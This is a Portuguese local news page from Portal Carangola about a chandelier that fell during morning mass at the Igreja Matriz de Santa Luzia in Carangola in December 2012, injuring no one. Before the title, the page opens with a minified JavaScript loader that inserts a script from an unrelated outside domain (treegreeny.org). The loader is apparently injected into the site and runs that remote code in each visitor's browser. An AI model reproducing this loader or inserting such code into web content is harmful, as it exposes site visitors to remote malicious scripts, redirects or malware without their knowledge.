;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Lustre da Igreja Matriz de Santa Luzia, cai durante a celebração da missa esta manhâ. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Lustre da Igreja Matriz de Santa Luzia, cai durante a celebração da missa esta manhâ.

Um dos lustres que ornamentavam o interior da Igreja Matriz de Santa Luzia em Carangola caiu durante a celebração da missa da manhã desse domingo dia 02 de dezembro de 2012.
Mesmo com a Igreja Matriz contando com a presença de inúmeros fiéis, felizmente não houve nenhum acidente com as pessoas presentes. Apenas o susto do estrondo do lustre ao cair no chão.
Já que o lustre que mede cerca de 4m  e é confeccionado em ferro, cobre e vidros. Pesando mais 30kg.
O fato aconteceu instantes após a passagem dos fiéis que levavam o ofertório na missa. Muitos acreditam ter sido uma benção não ter caído sobre ninguém na hora da passagem do ofertório.
A causa provável da queda deve ser o desgaste natural do tempo, pois o cabo de aço partiu. A igreja passa por reformas em seu telhado atualmente. Sendo trocadas as velhas e pesadas telhas de barro por outras mais leves e mais seguras. Isso demonstra a preocupação do Pároco local em preservar esse patrimônio. Não se sabe se a queda pode estar relacionada com essa obra.
Para garantia, segurança e medida preventiva o outro lustre existente também foi retirado.
A missa foi interrompida. Porém as demais celebrações aconteceram normalmente.
Estando há cerca de 12 dias da Celebração do Jubileu de Santa Luzia. Esse fato em nada altera a programação. Pois todas as medidas preventivas foram tomadas.
Os lustres serão restaurados e reinstalados em seus locais de origem com mais segurança.

Informação e fotos: O Combatente


Ofertas clique aqui


[vitrine]cameras[/vitrine]

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.